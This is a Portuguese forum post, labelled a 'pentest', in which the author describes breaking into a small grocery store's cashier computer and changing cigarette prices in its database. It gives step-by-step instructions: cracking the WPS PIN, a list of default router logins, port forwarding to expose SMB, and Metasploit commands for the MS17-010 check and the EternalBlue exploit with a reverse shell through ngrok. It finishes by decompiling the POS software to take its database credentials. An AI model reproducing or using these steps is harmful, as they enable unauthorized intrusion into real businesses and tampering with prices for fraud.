Jump to content
Sign in to follow this  
gusdnide

Pentest no mercadinho [COMPLETO]

Recommended Posts

Olá venho mostrar como  fiz para entrar no computador do mercadinho remotamente, foi o primeiro passo antes deu alterar o preço do cigarro para  4 reais (antes era  R$ 8,50 ja faz 5 dias e nada foi alterado ),

Passos:

1. Entrar na rede
  2. Mapear a rede & encontrar o caixa
  3. Encontrar vulnerabilidades
  4. Redirecionar portas do caixa para WAN
  5. Invaindo o caixa

Passo 1

Como voce não vai poder simplesmente se conectar a LAN , o padrão é tentar fazer uma conexão por Wi-fi, no meu caso a rede tinha WPS ligado, então usando o WPS App para encontrar o pin da rede para que eu possa conectar, voce pode usar varias ferramentas para tentar fazer ter conexao num wifi, 

Screenshot Image

Passo 2

Utilizei um app chamado Network Scanner para fazer uma varredura na rede, com isso você pode pegar cada dispositivo conectado a rede, procure por computadores na rede, no meu caso só existe 1 caixa no mercadinho e com isso foi facil descobrir qual dos hosts era e lembre-se reconhecer o sistema que está rodando, se for Windows você tem mais chances de conceguir, aproveite e pegue também o endereço do Gateway no caso: 192.168.1.1

//Simulaçao

adads.jpg

Passo 3

Ainda no Network Scanner, verifique as portas do computador , verifique se existe alguma porta vulneravel, no meu caso a 445 pode ser vulneravel ao terrivel EternalBlue e como o mercado não é muito grande provavelmente não fazem atualizaçao o sistema no sistema, oque pode ser um error fatal não deixar seu sistema atualizado,

2b499a7d-57bd-43a0-a215-b75322391b07.jpg

Passo 4

Entre no navegador e entre no gateway (Geralmente 192.168.1.1 ou 192.168.0.1),  provavelmente irá pedir login ou senha, você pode tentar usar o routersploit no android para poder encontrar o login e senha do roteador, mas você pode fazer testes rapidos em logins padroes (Lista abaixo) , assim que conceguiu acesso ao roteador você precisa liberar portas para o ip do caixa (lembre de redirecionar para o IP do caixa) geralmente uma pagina chamada Port Forwarding, achou? entao adicionar uma nova regra e Porta Publica (Public Port) use portas entre 1001-9999 pois a maioria dos scanners de portas scaneia de 1-1000 e em Porta Privada (Private Port) voce irá colocar a porta que se encontra uma possivel vulnerabilidade no meu caso 445 e no protocolo (protocol) voce coloca TCP , e aumentar a chance  nenhuma outra pessoa achar esse caminho, caso tenho dificuldades para liberar portas no roteador aproveite a internet gratis e pesquisa como abrir portas usando o modelo do roteador (que pode ser facilmente encontrado fusando no painel) 

Logins padrao:

• admin admin
  • admin (SENHA EM BRANCO)
  • admin gvt12345
  • guest guest

Captura-de-Tela-20190510105116.png

Passo 5 

Antes de ir embora para casa aproveite e pegue o IP WAN da rede, facilmente encontrado no site: MyIP org ou MeuIP br, em casa já com o café do lado, abra um bloco de notas e grave suas informaçoes nela ex:  164.216.21.3:4444 -> 192.168.1.21:445, bom vamos ver se realmente é  vulneravel ao ataque  do eternalblue , abra o metasploit e use smb_ms17_010  para checar se é vulneravel, exemplo do meu caso: RHOSTS: 164.216.21.3 RPORT: 4444 comandos abaixo.

msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 164.216.21.3 
set RPORT 4444
exploit

caso o retorno ter Host is likely VULNERABLE to MS17-010! é vulneravel como no meu caso abaixo:

[+] 164.216.21.3:4444       - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 164.216.21.3:4444       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Boa agora vamos explorar essa vulnerabilidade use o exploit windows/smb/ms17_010_eternalblue para invadir, no meu exemplo irei usar o ngrok para fazer tunnel com o meu localhost (APRENDA USAR O NGROK AQUI ) utilizarei o payload windows/meterpreter/reverse_http 

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 164.216.21.3
set RPORT 4444
set LHOST 0.tcp.ngrok.com
set LPORT 46707 
exploit

Pronto, agora estude o computador, meus passos para alterar o banco de  dados:

Naveguei até a area de trabalho, verifiquei todos os links, e vi que tinha um chamado Sis comerce, baixei o executavel dele, decompilei ele com o .NET Reflector, verifiquei que ele faz conexão com o banco de dados da Microsoft SQL Server, usando o mono desenvolvi uma ferramenta para conectar no banco usando os dados que decompilei (Existe uma classe conectora do DB contendo host, user...) só apliquei a mesma coisa no mono, simplesmente atualizei o preço de todos os produtos com o nome "CIGARRO DE PALHA MINAS" para 4.00.

Videos que podem ajudar:

Edited by gusdnide
  • Like 2